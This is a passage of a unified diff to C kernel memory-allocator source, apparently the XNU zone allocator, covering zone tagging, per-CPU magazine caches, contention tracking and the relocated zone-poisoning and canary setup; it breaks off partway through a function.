+/*! @} */
+#pragma mark ZTAGS
+#if !ZALLOC_TEST
+#if VM_MAX_TAG_ZONES
 /*
- * Initialize zone poisoning
- * called from zone_bootstrap before any allocations are made from zalloc
+ * Zone tagging allows for per "tag" accounting of allocations for the kalloc
+ * zones only.
+ *
+ * There are 3 kinds of tags that can be used:
+ * - pre-registered VM_KERN_MEMORY_*
+ * - dynamic tags allocated per call sites in core-kernel (using vm_tag_alloc())
+ * - per-kext tags computed by IOKit (using the magic VM_TAG_BT marker).
+ *
+ * The VM tracks the statistics in lazily allocated structures.
+ * See vm_tag_will_update_zone(), vm_tag_update_zone_size().
+ *
+ * If for some reason the requested tag cannot be accounted for,
+ * the tag is forced to VM_KERN_MEMORY_KALLOC which is pre-allocated.
+ *
+ * Each allocated element also remembers the tag it was assigned,
+ * in its ztSlot() which lets zalloc/zfree update statistics correctly.
  */
-__startup_func
-static void
-zp_bootstrap(void)
-{
-       char temp_buf[16];
 
-       /*
-        * Initialize backup pointer random cookie for poisoned elements
-        * Try not to call early_random() back to back, it may return
-        * the same value if mach_absolute_time doesn't have sufficient time
-        * to tick over between calls.  <rdar://problem/11597395>
-        * (This is only a problem on embedded devices)
-        */
-       zp_poisoned_cookie = (uintptr_t) early_random();
+// for zones with tagging enabled:
 
-       /* -zp: enable poisoning for every alloc and free */
-       if (PE_parse_boot_argn("-zp", temp_buf, sizeof(temp_buf))) {
-               zp_factor = 1;
-       }
+// calculate a pointer to the tag base entry,
+// holding either a uint32_t with the first tag offset for a page in the zone map,
+// or two uint16_t tags if the page can only hold one or two elements
 
-       /* -no-zp: disable poisoning */
-       if (PE_parse_boot_argn("-no-zp", temp_buf, sizeof(temp_buf))) {
-               zp_factor = 0;
-               printf("Zone poisoning disabled\n");
-       }
+#define ZTAGBASE(zone, element) \
+       (&((uint32_t *)zone_tagbase_min)[atop((element) - \
+           zone_info.zi_map_range[ZONE_ADDR_NATIVE].min_address)])
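+// i.e. one uint32_t entry per page of the native zone map, indexed by the
+// page number of `element` relative to the start of that range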
 
-       /* Initialize backup pointer random cookie for unpoisoned elements */
-       zp_nopoison_cookie = (uintptr_t) early_random();
+static vm_offset_t  zone_tagbase_min;
+static vm_offset_t  zone_tagbase_max;
+static vm_offset_t  zone_tagbase_map_size;
+static vm_map_t     zone_tagbase_map;
 
-#if MACH_ASSERT
-       if (zp_poisoned_cookie == zp_nopoison_cookie) {
-               panic("early_random() is broken: %p and %p are not random\n",
-                   (void *) zp_poisoned_cookie, (void *) zp_nopoison_cookie);
-       }
-#endif
+static vm_offset_t  zone_tags_min;
+static vm_offset_t  zone_tags_max;
+static vm_offset_t  zone_tags_map_size;
+static vm_map_t     zone_tags_map;
 
-       /*
-        * Use the last bit in the backup pointer to hint poisoning state
-        * to backup_ptr_mismatch_panic. Valid zone pointers are aligned, so
-        * the low bits are zero.
-        */
-       zp_poisoned_cookie |=   (uintptr_t)0x1ULL;
-       zp_nopoison_cookie &= ~((uintptr_t)0x1ULL);
+// simple heap allocator for allocating the tags for new memory
 
-#if defined(__LP64__)
-       /*
-        * Make backup pointers more obvious in GDB for 64 bit
-        * by making OxFFFFFF... ^ cookie = 0xFACADE...
-        * (0xFACADE = 0xFFFFFF ^ 0x053521)
-        * (0xC0FFEE = 0xFFFFFF ^ 0x3f0011)
-        * The high 3 bytes of a zone pointer are always 0xFFFFFF, and are checked
-        * by the sanity check, so it's OK for that part of the cookie to be predictable.
-        *
-        * TODO: Use #defines, xors, and shifts
-        */
+static LCK_MTX_EARLY_DECLARE(ztLock, &zone_locks_grp); /* heap lock */
 
-       zp_poisoned_cookie &= 0x000000FFFFFFFFFF;
-       zp_poisoned_cookie |= 0x0535210000000000; /* 0xFACADE */
+enum{
+       ztFreeIndexCount = 8,
+       ztFreeIndexMax   = (ztFreeIndexCount - 1),
+       ztTagsPerBlock   = 4
+};
 
-       zp_nopoison_cookie &= 0x000000FFFFFFFFFF;
-       zp_nopoison_cookie |= 0x3f00110000000000; /* 0xC0FFEE */
+struct ztBlock {
+#if __LITTLE_ENDIAN__
+       uint64_t free:1,
+           next:21,
+           prev:21,
+           size:21;
+#else
+// ztBlock needs free bit least significant
+#error !__LITTLE_ENDIAN__
 #endif
+};
+typedef struct ztBlock ztBlock;
 
-       /*
-        * Initialize zp_min_size to two cachelines. Elements smaller than this will
-        * be zero-ed.
-        */
-       ml_cpu_info_t cpu_info;
-       ml_cpu_get_info(&cpu_info);
-       zp_min_size = 2 * cpu_info.cache_line_size;
-}
-
-inline uint32_t
-zone_poison_count_init(zone_t zone)
-{
-       return zp_factor + (((uint32_t)zone_elem_size(zone)) >> zp_scale) ^
-              (mach_absolute_time() & 0x7);
-}
+static ztBlock * ztBlocks;
+static uint32_t  ztBlocksCount;
+static uint32_t  ztBlocksFree;
 
-#if ZALLOC_ENABLE_POISONING
-static bool
-zfree_poison_element(zone_t zone, uint32_t *zp_count, vm_offset_t elem)
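+// e.g. ztLog2up(1) == 0, ztLog2up(4) == 2, ztLog2up(5) == 3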
+static uint32_t
+ztLog2up(uint32_t size)
 {
-       bool poison = false;
-       uint32_t zp_count_local;
-
-       assert(!zone->percpu);
-       if (zp_factor != 0) {
-               /*
-                * Poison the memory of every zp_count-th element before it ends up
-                * on the freelist to catch use-after-free and use of uninitialized
-                * memory.
-                *
-                * Every element is poisoned when zp_factor is set to 1.
-                *
-                */
-               zp_count_local = os_atomic_load(zp_count, relaxed);
-               if (__improbable(zp_count_local == 0 || zp_factor == 1)) {
-                       poison = true;
-
-                       os_atomic_store(zp_count, zone_poison_count_init(zone), relaxed);
-
-                       /* memset_pattern{4|8} could help make this faster: <rdar://problem/4662004> */
-                       vm_offset_t *element_cursor  = ((vm_offset_t *) elem);
-                       vm_offset_t *end_cursor      = (vm_offset_t *)(elem + zone_elem_size(zone));
-
-                       for (; element_cursor < end_cursor; element_cursor++) {
-                               *element_cursor = ZONE_POISON;
-                       }
-               } else {
-                       os_atomic_store(zp_count, zp_count_local - 1, relaxed);
-                       /*
-                        * Zero first zp_min_size bytes of elements that aren't being poisoned.
-                        * Element size is larger than zp_min_size in this path as elements
-                        * that are smaller will always be zero-ed.
-                        */
-                       bzero((void *) elem, zp_min_size);
-               }
+       if (1 == size) {
+               size = 0;
+       } else {
+               size = 32 - __builtin_clz(size - 1);
        }
-       return poison;
-}
-#else
-static bool
-zfree_poison_element(zone_t zone, uint32_t *zp_count, vm_offset_t elem)
-{
-#pragma unused(zone, zp_count, elem)
-       assert(!zone->percpu);
-       return false;
+       return size;
 }
-#endif
 
-__attribute__((always_inline))
-static bool
-zfree_clear(zone_t zone, vm_offset_t addr, vm_size_t elem_size)
+// pointer to the tag for an element
+static vm_tag_t *
+ztSlot(zone_t zone, vm_offset_t element)
 {
-       assert(zone->zfree_clear_mem);
-       if (zone->percpu) {
-               zpercpu_foreach_cpu(i) {
-                       bzero((void *)(addr + ptoa(i)), elem_size);
+       vm_tag_t *result;
+       if (zone->tags_inline) {
+               result = (vm_tag_t *)ZTAGBASE(zone, element);
+               if ((PAGE_MASK & element) >= zone_elem_size(zone)) {
+                       result++;
                }
        } else {
-               bzero((void *)addr, elem_size);
+               result = &((vm_tag_t *)zone_tags_min)[ZTAGBASE(zone, element)[0] +
+                   (element & PAGE_MASK) / zone_elem_size(zone)];
        }
-
-       return true;
+       return result;
 }
 
-/*
- * Zero the element if zone has zfree_clear_mem flag set else poison
- * the element if zp_count hits 0.
- */
-__attribute__((always_inline))
-bool
-zfree_clear_or_poison(zone_t zone, uint32_t *zp_count, vm_offset_t addr)
+static uint32_t
+ztLog2down(uint32_t size)
 {
-       vm_size_t elem_size = zone_elem_size(zone);
-
-       if (zone->zfree_clear_mem) {
-               return zfree_clear(zone, addr, elem_size);
-       }
-
-       return zfree_poison_element(zone, zp_count, (vm_offset_t)addr);
+       size = 31 - __builtin_clz(size);
+       return size;
 }
 
+static void
+ztFault(vm_map_t map, const void * address, size_t size, uint32_t flags)
+{
+       vm_map_offset_t addr = (vm_map_offset_t) address;
+       vm_map_offset_t page, end;
+
+       page = trunc_page(addr);
+       end  = round_page(addr + size);
+
+       for (; page < end; page += page_size) {
+               if (!pmap_find_phys(kernel_pmap, page)) {
+                       kern_return_t __unused
+                       ret = kernel_memory_populate(map, page, PAGE_SIZE,
+                           KMA_KOBJECT | flags, VM_KERN_MEMORY_DIAG);
+                       assert(ret == KERN_SUCCESS);
+               }
+       }
+}
+
+static boolean_t
+ztPresent(const void * address, size_t size)
+{
+       vm_map_offset_t addr = (vm_map_offset_t) address;
+       vm_map_offset_t page, end;
+       boolean_t       result;
+
+       page = trunc_page(addr);
+       end  = round_page(addr + size);
+       for (result = TRUE; (page < end); page += page_size) {
+               result = pmap_find_phys(kernel_pmap, page);
+               if (!result) {
+                       break;
+               }
+       }
+       return result;
+}
+
+
+void __unused
+ztDump(boolean_t sanity);
+void __unused
+ztDump(boolean_t sanity)
+{
+       uint32_t q, cq, p;
+
+       for (q = 0; q <= ztFreeIndexMax; q++) {
+               p = q;
+               do{
+                       if (sanity) {
+                               cq = ztLog2down(ztBlocks[p].size);
+                               if (cq > ztFreeIndexMax) {
+                                       cq = ztFreeIndexMax;
+                               }
+                               if (!ztBlocks[p].free
+                                   || ((p != q) && (q != cq))
+                                   || (ztBlocks[ztBlocks[p].next].prev != p)
+                                   || (ztBlocks[ztBlocks[p].prev].next != p)) {
+                                       kprintf("zterror at %d", p);
+                                       ztDump(FALSE);
+                                       kprintf("zterror at %d", p);
+                                       assert(FALSE);
+                               }
+                               continue;
+                       }
+                       kprintf("zt[%03d]%c %d, %d, %d\n",
+                           p, ztBlocks[p].free ? 'F' : 'A',
+                           ztBlocks[p].next, ztBlocks[p].prev,
+                           ztBlocks[p].size);
+                       p = ztBlocks[p].next;
+                       if (p == q) {
+                               break;
+                       }
+               }while (p != q);
+               if (!sanity) {
+                       printf("\n");
+               }
+       }
+       if (!sanity) {
+               printf("-----------------------\n");
+       }
+}
+
+
+
+#define ZTBDEQ(idx)                                                 \
+    ztBlocks[ztBlocks[(idx)].prev].next = ztBlocks[(idx)].next;     \
+    ztBlocks[ztBlocks[(idx)].next].prev = ztBlocks[(idx)].prev;
+
+static void
+ztFree(zone_t zone __unused, uint32_t index, uint32_t count)
+{
+       uint32_t q, w, p, size, merge;
+
+       assert(count);
+       ztBlocksFree += count;
+
+       // merge with the following block
+       merge = (index + count);
+       if ((merge < ztBlocksCount)
+           && ztPresent(&ztBlocks[merge], sizeof(ztBlocks[merge]))
+           && ztBlocks[merge].free) {
+               ZTBDEQ(merge);
+               count += ztBlocks[merge].size;
+       }
+
+       // merge with the preceding block
+       merge = (index - 1);
+       if ((merge > ztFreeIndexMax)
+           && ztPresent(&ztBlocks[merge], sizeof(ztBlocks[merge]))
+           && ztBlocks[merge].free) {
+               size = ztBlocks[merge].size;
+               count += size;
+               index -= size;
+               ZTBDEQ(index);
+       }
+
+       q = ztLog2down(count);
+       if (q > ztFreeIndexMax) {
+               q = ztFreeIndexMax;
+       }
+       w = q;
+       // queue in order of size
+       while (TRUE) {
+               p = ztBlocks[w].next;
+               if (p == q) {
+                       break;
+               }
+               if (ztBlocks[p].size >= count) {
+                       break;
+               }
+               w = p;
+       }
+       ztBlocks[p].prev = index;
+       ztBlocks[w].next = index;
+
+       // fault in first
+       ztFault(zone_tags_map, &ztBlocks[index], sizeof(ztBlocks[index]), 0);
+
+       // mark first & last with free flag and size
+       ztBlocks[index].free = TRUE;
+       ztBlocks[index].size = count;
+       ztBlocks[index].prev = w;
+       ztBlocks[index].next = p;
+       if (count > 1) {
+               index += (count - 1);
+               // fault in last
+               ztFault(zone_tags_map, &ztBlocks[index], sizeof(ztBlocks[index]), 0);
+               ztBlocks[index].free = TRUE;
+               ztBlocks[index].size = count;
+       }
+}
+
+static uint32_t
+ztAlloc(zone_t zone, uint32_t count)
+{
+       uint32_t q, w, p, leftover;
+
+       assert(count);
+
+       q = ztLog2up(count);
+       if (q > ztFreeIndexMax) {
+               q = ztFreeIndexMax;
+       }
+       do{
+               w = q;
+               while (TRUE) {
+                       p = ztBlocks[w].next;
+                       if (p == q) {
+                               break;
+                       }
+                       if (ztBlocks[p].size >= count) {
+                               // dequeue, mark both ends allocated
+                               ztBlocks[w].next = ztBlocks[p].next;
+                               ztBlocks[ztBlocks[p].next].prev = w;
+                               ztBlocks[p].free = FALSE;
+                               ztBlocksFree -= ztBlocks[p].size;
+                               if (ztBlocks[p].size > 1) {
+                                       ztBlocks[p + ztBlocks[p].size - 1].free = FALSE;
+                               }
+
+                               // fault all the allocation
+                               ztFault(zone_tags_map, &ztBlocks[p], count * sizeof(ztBlocks[p]), 0);
+                               // mark last as allocated
+                               if (count > 1) {
+                                       ztBlocks[p + count - 1].free = FALSE;
+                               }
+                               // free remainder
+                               leftover = ztBlocks[p].size - count;
+                               if (leftover) {
+                                       ztFree(zone, p + ztBlocks[p].size - leftover, leftover);
+                               }
+
+                               return p;
+                       }
+                       w = p;
+               }
+               q++;
+       }while (q <= ztFreeIndexMax);
+
+       return -1U;
+}
+
+__startup_func
+static void
+zone_tagging_init(vm_size_t max_zonemap_size)
+{
+       kern_return_t         ret;
+       vm_map_kernel_flags_t vmk_flags;
+       uint32_t              idx;
+
+       // allocate submaps VM_KERN_MEMORY_DIAG
+
+       zone_tagbase_map_size = atop(max_zonemap_size) * sizeof(uint32_t);
+       vmk_flags = VM_MAP_KERNEL_FLAGS_NONE;
+       vmk_flags.vmkf_permanent = TRUE;
+       ret = kmem_suballoc(kernel_map, &zone_tagbase_min, zone_tagbase_map_size,
+           FALSE, VM_FLAGS_ANYWHERE, vmk_flags, VM_KERN_MEMORY_DIAG,
+           &zone_tagbase_map);
+
+       if (ret != KERN_SUCCESS) {
+               panic("zone_init: kmem_suballoc failed");
+       }
+       zone_tagbase_max = zone_tagbase_min + round_page(zone_tagbase_map_size);
+
+       zone_tags_map_size = 2048 * 1024 * sizeof(vm_tag_t);
+       vmk_flags = VM_MAP_KERNEL_FLAGS_NONE;
+       vmk_flags.vmkf_permanent = TRUE;
+       ret = kmem_suballoc(kernel_map, &zone_tags_min, zone_tags_map_size,
+           FALSE, VM_FLAGS_ANYWHERE, vmk_flags, VM_KERN_MEMORY_DIAG,
+           &zone_tags_map);
+
+       if (ret != KERN_SUCCESS) {
+               panic("zone_init: kmem_suballoc failed");
+       }
+       zone_tags_max = zone_tags_min + round_page(zone_tags_map_size);
+
+       ztBlocks = (ztBlock *) zone_tags_min;
+       ztBlocksCount = (uint32_t)(zone_tags_map_size / sizeof(ztBlock));
+
+       // initialize the qheads
+       lck_mtx_lock(&ztLock);
+
+       ztFault(zone_tags_map, &ztBlocks[0], sizeof(ztBlocks[0]), 0);
+       for (idx = 0; idx < ztFreeIndexCount; idx++) {
+               ztBlocks[idx].free = TRUE;
+               ztBlocks[idx].next = idx;
+               ztBlocks[idx].prev = idx;
+               ztBlocks[idx].size = 0;
+       }
+       // free remaining space
+       ztFree(NULL, ztFreeIndexCount, ztBlocksCount - ztFreeIndexCount);
+
+       lck_mtx_unlock(&ztLock);
+}
+
+static void
+ztMemoryAdd(zone_t zone, vm_offset_t mem, vm_size_t size)
+{
+       uint32_t * tagbase;
+       uint32_t   count, block, blocks, idx;
+       size_t     pages;
+
+       pages = atop(size);
+       tagbase = ZTAGBASE(zone, mem);
+
+       lck_mtx_lock(&ztLock);
+
+       // fault tagbase
+       ztFault(zone_tagbase_map, tagbase, pages * sizeof(uint32_t), 0);
+
+       if (!zone->tags_inline) {
+               // allocate tags
+               count = (uint32_t)(size / zone_elem_size(zone));
+               blocks = ((count + ztTagsPerBlock - 1) / ztTagsPerBlock);
+               block = ztAlloc(zone, blocks);
+               if (-1U == block) {
+                       ztDump(false);
+               }
+               assert(-1U != block);
+       }
+
+       lck_mtx_unlock(&ztLock);
+
+       if (!zone->tags_inline) {
+               // set tag base for each page
+               block *= ztTagsPerBlock;
+               for (idx = 0; idx < pages; idx++) {
+                       vm_offset_t esize = zone_elem_size(zone);
+                       tagbase[idx] = block + (uint32_t)((ptoa(idx) + esize - 1) / esize);
+               }
+       }
+}
+
+static void
+ztMemoryRemove(zone_t zone, vm_offset_t mem, vm_size_t size)
+{
+       uint32_t * tagbase;
+       uint32_t   count, block, blocks, idx;
+       size_t     pages;
+
+       // set tag base for each page
+       pages = atop(size);
+       tagbase = ZTAGBASE(zone, mem);
+       block = tagbase[0];
+       for (idx = 0; idx < pages; idx++) {
+               tagbase[idx] = 0xFFFFFFFF;
+       }
+
+       lck_mtx_lock(&ztLock);
+       if (!zone->tags_inline) {
+               count = (uint32_t)(size / zone_elem_size(zone));
+               blocks = ((count + ztTagsPerBlock - 1) / ztTagsPerBlock);
+               assert(block != 0xFFFFFFFF);
+               block /= ztTagsPerBlock;
+               ztFree(NULL /* zone is unlocked */, block, blocks);
+       }
+
+       lck_mtx_unlock(&ztLock);
+}
+
+uint32_t
+zone_index_from_tag_index(uint32_t tag_zone_index, vm_size_t * elem_size)
+{
+       simple_lock(&all_zones_lock, &zone_locks_grp);
+
+       zone_index_foreach(idx) {
+               zone_t z = &zone_array[idx];
+               if (!z->tags) {
+                       continue;
+               }
+               if (tag_zone_index != z->tag_zone_index) {
+                       continue;
+               }
+
+               *elem_size = zone_elem_size(z);
+               simple_unlock(&all_zones_lock);
+               return idx;
+       }
+
+       simple_unlock(&all_zones_lock);
+
+       return -1U;
+}
+
+#endif /* VM_MAX_TAG_ZONES */
+#endif /* !ZALLOC_TEST */
+#pragma mark zalloc helpers
+#if !ZALLOC_TEST
+
+__pure2
+static inline uint16_t
+zc_mag_size(void)
+{
+       return zc_magazine_size;
+}
+
+__attribute__((noinline, cold))
+static void
+zone_lock_was_contended(zone_t zone, zone_cache_t zc)
+{
+       lck_spin_lock_nopreempt(&zone->z_lock);
+
+       /*
+        * If zone caching has been disabled due to memory pressure,
+        * then recording contention is not useful; give the system
+        * time to recover.
+        */
+       if (__improbable(zone_caching_disabled)) {
+               return;
+       }
+
+       zone->z_contention_cur++;
+
+       if (zc == NULL || zc->zc_depot_max >= INT16_MAX * zc_mag_size()) {
+               return;
+       }
+
+       /*
+        * Let the depot grow based on how bad the contention is,
+        * and how populated the zone is.
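+        * Concretely: under mild contention (WMA below 2 units) the summed
+        * per-CPU depot limits may only grow while they stay under ~5% of
+        * the zone's available elements, below 4 units under ~10%, and no
+        * growth happens at all until the WMA reaches zc_grow_threshold.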
+        */
+       if (zone->z_contention_wma < 2 * Z_CONTENTION_WMA_UNIT) {
+               if (zc->zc_depot_max * zpercpu_count() * 20u >=
+                   zone->z_elems_avail) {
+                       return;
+               }
+       }
+       if (zone->z_contention_wma < 4 * Z_CONTENTION_WMA_UNIT) {
+               if (zc->zc_depot_max * zpercpu_count() * 10u >=
+                   zone->z_elems_avail) {
+                       return;
+               }
+       }
+       if (!zc_grow_threshold || zone->z_contention_wma <
+           zc_grow_threshold * Z_CONTENTION_WMA_UNIT) {
+               return;
+       }
+
+       zc->zc_depot_max++;
+}
+
+static inline void
+zone_lock_nopreempt_check_contention(zone_t zone, zone_cache_t zc)
+{
+       if (lck_spin_try_lock_nopreempt(&zone->z_lock)) {
+               return;
+       }
+
+       zone_lock_was_contended(zone, zc);
+}
+
+static inline void
+zone_lock_check_contention(zone_t zone, zone_cache_t zc)
+{
+       disable_preemption();
+       zone_lock_nopreempt_check_contention(zone, zc);
+}
+
+static inline void
+zone_unlock_nopreempt(zone_t zone)
+{
+       lck_spin_unlock_nopreempt(&zone->z_lock);
+}
+
+static inline void
+zone_depot_lock_nopreempt(zone_cache_t zc)
+{
+       hw_lock_bit_nopreempt(&zc->zc_depot_lock, 0, &zone_locks_grp);
+}
+
+static inline void
+zone_depot_unlock_nopreempt(zone_cache_t zc)
+{
+       hw_unlock_bit_nopreempt(&zc->zc_depot_lock, 0);
+}
+
+static inline void
+zone_depot_lock(zone_cache_t zc)
+{
+       hw_lock_bit(&zc->zc_depot_lock, 0, &zone_locks_grp);
+}
+
+static inline void
+zone_depot_unlock(zone_cache_t zc)
+{
+       hw_unlock_bit(&zc->zc_depot_lock, 0);
+}
+
+const char *
+zone_name(zone_t z)
+{
+       return z->z_name;
+}
+
+const char *
+zone_heap_name(zone_t z)
+{
+       if (__probable(z->kalloc_heap < KHEAP_ID_COUNT)) {
+               return kalloc_heap_names[z->kalloc_heap];
+       }
+       return "invalid";
+}
+
+static uint32_t
+zone_alloc_pages_for_nelems(zone_t z, vm_size_t max_elems)
+{
+       vm_size_t elem_count, chunks;
+
+       elem_count = ptoa(z->z_percpu ? 1 : z->z_chunk_pages) / zone_elem_size(z);
+       chunks = (max_elems + elem_count - 1) / elem_count;
+
+       return (uint32_t)MIN(UINT32_MAX, chunks * z->z_chunk_pages);
+}
+
+static inline vm_size_t
+zone_submaps_approx_size(void)
+{
+       vm_size_t size = 0;
+
+       for (unsigned idx = 0; idx <= zone_last_submap_idx; idx++) {
+               size += zone_submaps[idx]->size;
+       }
+
+       return size;
+}
+
+static void
+zone_cache_swap_magazines(zone_cache_t cache)
+{
+       uint16_t count_a = cache->zc_alloc_cur;
+       uint16_t count_f = cache->zc_free_cur;
+       zone_element_t *elems_a = cache->zc_alloc_elems;
+       zone_element_t *elems_f = cache->zc_free_elems;
+
+       z_debug_assert(count_a <= zc_mag_size());
+       z_debug_assert(count_f <= zc_mag_size());
+
+       cache->zc_alloc_cur = count_f;
+       cache->zc_free_cur = count_a;
+       cache->zc_alloc_elems = elems_f;
+       cache->zc_free_elems = elems_a;
+}
+
+/*!
+ * @function zone_magazine_load
+ *
+ * @brief
+ * Cache the value of @c zm_cur in the zone cache to avoid a dependent load
+ * on the allocation fastpath.
+ */
+static void
+zone_magazine_load(uint16_t *count, zone_element_t **elems, zone_magazine_t mag)
+{
+       z_debug_assert(mag->zm_cur <= zc_mag_size());
+       *count = mag->zm_cur;
+       *elems = mag->zm_elems;
+}
+
+/*!
+ * @function zone_magazine_replace
+ *
+ * @brief
+ * Unload a magazine and load a new one instead.
+ */
+static zone_magazine_t
+zone_magazine_replace(uint16_t *count, zone_element_t **elems,
+    zone_magazine_t mag)
+{
+       zone_magazine_t old;
+
+       old = (zone_magazine_t)((uintptr_t)*elems -
+           offsetof(struct zone_magazine, zm_elems));
+       old->zm_cur = *count;
+       z_debug_assert(old->zm_cur <= zc_mag_size());
+       zone_magazine_load(count, elems, mag);
+
+       return old;
+}
+
+static zone_magazine_t
+zone_magazine_alloc(zalloc_flags_t flags)
+{
+       return zalloc_ext(zc_magazine_zone, zc_magazine_zone->z_stats,
+                  flags | Z_ZERO);
+}
+
+static void
+zone_magazine_free(zone_magazine_t mag)
+{
+       zfree_ext(zc_magazine_zone, zc_magazine_zone->z_stats, mag);
+}
+
+static void
+zone_enable_caching(zone_t zone)
+{
+       zone_cache_t caches;
+
+       caches = zalloc_percpu_permanent_type(struct zone_cache);
+       zpercpu_foreach(zc, caches) {
+               zone_magazine_load(&zc->zc_alloc_cur, &zc->zc_alloc_elems,
+                   zone_magazine_alloc(Z_WAITOK | Z_NOFAIL));
+               zone_magazine_load(&zc->zc_free_cur, &zc->zc_free_elems,
+                   zone_magazine_alloc(Z_WAITOK | Z_NOFAIL));
+               STAILQ_INIT(&zc->zc_depot);
+       }
+
+       if (os_atomic_xchg(&zone->z_pcpu_cache, caches, release)) {
+               panic("allocating caches for zone %s twice", zone->z_name);
+       }
+}
+
+bool
+zone_maps_owned(vm_address_t addr, vm_size_t size)
+{
+       return from_zone_map(addr, size, ZONE_ADDR_NATIVE);
+}
+
+void
+zone_map_sizes(
+       vm_map_size_t    *psize,
+       vm_map_size_t    *pfree,
+       vm_map_size_t    *plargest_free)
+{
+       vm_map_size_t size, free, largest;
+
+       vm_map_sizes(zone_submaps[0], psize, pfree, plargest_free);
+
+       for (uint32_t i = 1; i <= zone_last_submap_idx; i++) {
+               vm_map_sizes(zone_submaps[i], &size, &free, &largest);
+               *psize += size;
+               *pfree += free;
+               *plargest_free = MAX(*plargest_free, largest);
+       }
+}
+
+__attribute__((always_inline))
+vm_map_t
+zone_submap(zone_t zone)
+{
+       return zone_submaps[zone->z_submap_idx];
+}
+
+unsigned
+zpercpu_count(void)
+{
+       return zpercpu_early_count;
+}
+
+int
+track_this_zone(const char *zonename, const char *logname)
+{
+       unsigned int len;
+       const char *zc = zonename;
+       const char *lc = logname;
+
+       /*
+        * Compare the strings.  We bound the compare by MAX_ZONE_NAME.
+        */
+
+       for (len = 1; len <= MAX_ZONE_NAME; zc++, lc++, len++) {
+               /*
+                * If the current characters don't match, check for a space
+                * in the zone name and a corresponding period in the log name.
+                * If that's not there, then the strings don't match.
+                */
+
+               if (*zc != *lc && !(*zc == ' ' && *lc == '.')) {
+                       break;
+               }
+
+               /*
+                * The strings are equal so far.  If we're at the end, then it's a match.
+                */
+
+               if (*zc == '\0') {
+                       return TRUE;
+               }
+       }
+
+       return FALSE;
+}
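+
+/*
+ * Illustrative example (not part of this change): because boot-args cannot
+ * contain spaces, a '.' in the log name stands in for a ' ' in the zone
+ * name.  The helper and zone names below are made up.
+ */
+#if 0 /* example only */
+static bool
+example_zlog_match(void)
+{
+       /* boot-arg "zlog=vm.objects" selects a zone named "vm objects" */
+       return track_this_zone("vm objects", "vm.objects") &&
+              !track_this_zone("vm objects", "vm_objects");
+}
+#endif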
+
+#if DEBUG || DEVELOPMENT
+
+vm_size_t
+zone_element_info(void *addr, vm_tag_t * ptag)
+{
+       vm_size_t     size = 0;
+       vm_tag_t      tag = VM_KERN_MEMORY_NONE;
+       struct zone *src_zone;
+
+       if (from_zone_map(addr, sizeof(void *), ZONE_ADDR_NATIVE) ||
+           from_zone_map(addr, sizeof(void *), ZONE_ADDR_FOREIGN)) {
+               src_zone = &zone_array[zone_index_from_ptr(addr)];
+#if VM_MAX_TAG_ZONES
+               if (__improbable(src_zone->tags)) {
+                       tag = *ztSlot(src_zone, (vm_offset_t)addr) >> 1;
+               }
+#endif /* VM_MAX_TAG_ZONES */
+               size = zone_elem_size(src_zone);
+       } else {
+#if CONFIG_GZALLOC
+               gzalloc_element_size(addr, NULL, &size);
+#endif /* CONFIG_GZALLOC */
+       }
+       *ptag = tag;
+       return size;
+}
+
+#endif /* DEBUG || DEVELOPMENT */
+
+/* The backup pointer is stored in the last pointer-sized location in an element. */
+__header_always_inline vm_offset_t *
+get_primary_ptr(vm_offset_t elem)
+{
+       return (vm_offset_t *)elem;
+}
+
+__header_always_inline vm_offset_t *
+get_backup_ptr(vm_offset_t elem, vm_size_t elem_size)
+{
+       return (vm_offset_t *)(elem + elem_size - sizeof(vm_offset_t));
+}
+
+#endif /* !ZALLOC_TEST */
+#pragma mark Zone poisoning/zeroing and early random
+#if !ZALLOC_TEST
+
+#define ZONE_ENTROPY_CNT 2
+static struct zone_bool_gen {
+       struct bool_gen zbg_bg;
+       uint32_t zbg_entropy[ZONE_ENTROPY_CNT];
+} zone_bool_gen[MAX_CPUS];
+
+/*
+ * Initialize zone poisoning
+ * called from zone_bootstrap before any allocations are made from zalloc
+ */
+__startup_func
+static void
+zp_bootstrap(void)
+{
+       char temp_buf[16];
+
+       /*
+        * Initialize canary random cookie.
+        *
+        * Make sure that (zp_canary ^ pointer) has non-zero low bits (01),
+        * different from ZONE_POISON (11).
+        *
+        * On LP64, also make (zp_canary ^ pointer) have its high bits equal 0xC0FFEE...
+        */
+       static_assert(ZONE_POISON % 4 == 3);
+       zp_canary = (uintptr_t)early_random();
+#if __LP64__
+       zp_canary &= 0x000000fffffffffc;
+       zp_canary |= 0xc0ffee0000000001 ^ 0xffffff0000000000;
+#else
+       zp_canary &= 0xfffffffc;
+       zp_canary |= 0x00000001;
+#endif
+
+       /* -zp: enable poisoning for every alloc and free */
+       if (PE_parse_boot_argn("-zp", temp_buf, sizeof(temp_buf))) {
+               zp_factor = 1;
+       }
+
+       /* -no-zp: disable poisoning */
+       if (PE_parse_boot_argn("-no-zp", temp_buf, sizeof(temp_buf))) {
+               zp_factor = 0;
+               printf("Zone poisoning disabled\n");
+       }
+
+       zpercpu_foreach_cpu(cpu) {
+               random_bool_init(&zone_bool_gen[cpu].zbg_bg);
+       }
+}
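+
+/*
+ * Worked example for the cookie above (illustrative; assumes zone element
+ * addresses live in the canonical 0xffffffXXXXXXXXXX kernel range on LP64):
+ * the masks force the top 24 bits of zp_canary to 0x3f0011 (0xC0FFEE ^
+ * 0xFFFFFF) and its low two bits to 01, so for any pointer-aligned element
+ * address, (zp_canary ^ addr) has its high bits equal to 0xC0FFEE and its
+ * low two bits equal to 01, and can never be mistaken for ZONE_POISON
+ * (low bits 11) or for a zeroed word.
+ */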
+
+static inline uint32_t
+zone_poison_count_init(zone_t zone)
+{
+       return zp_factor + (((uint32_t)zone_elem_size(zone)) >> zp_scale) ^
+              (mach_absolute_time() & 0x7);
+}
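+
+/*
+ * Worked example (illustrative; the zp_factor and zp_scale values are
+ * assumed, not taken from this change): with zp_factor == 16, zp_scale == 4
+ * and a 256-byte element, the expression above evaluates to
+ * (16 + (256 >> 4)) ^ jitter == 32 ^ (0..7), i.e. a reset value between
+ * 32 and 39, so roughly one out of every ~32-39 frees in that zone gets
+ * fully poisoned.
+ */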
+
+/*
+ * Zero the element if zone has z_free_zeroes flag set else poison
+ * the element if zs_poison_seqno hits 0.
+ */
+static zprot_mode_t
+zfree_clear_or_poison(zone_t zone, vm_offset_t addr, vm_offset_t elem_size)
+{
+       if (zone->z_free_zeroes) {
+               if (zone->z_percpu) {
+                       zpercpu_foreach_cpu(i) {
+                               bzero((void *)(addr + ptoa(i)), elem_size);
+                       }
+               } else {
+                       bzero((void *)addr, elem_size);
+               }
+               return ZPM_ZERO;
+       }
+
+       zprot_mode_t poison = ZPM_AUTO;
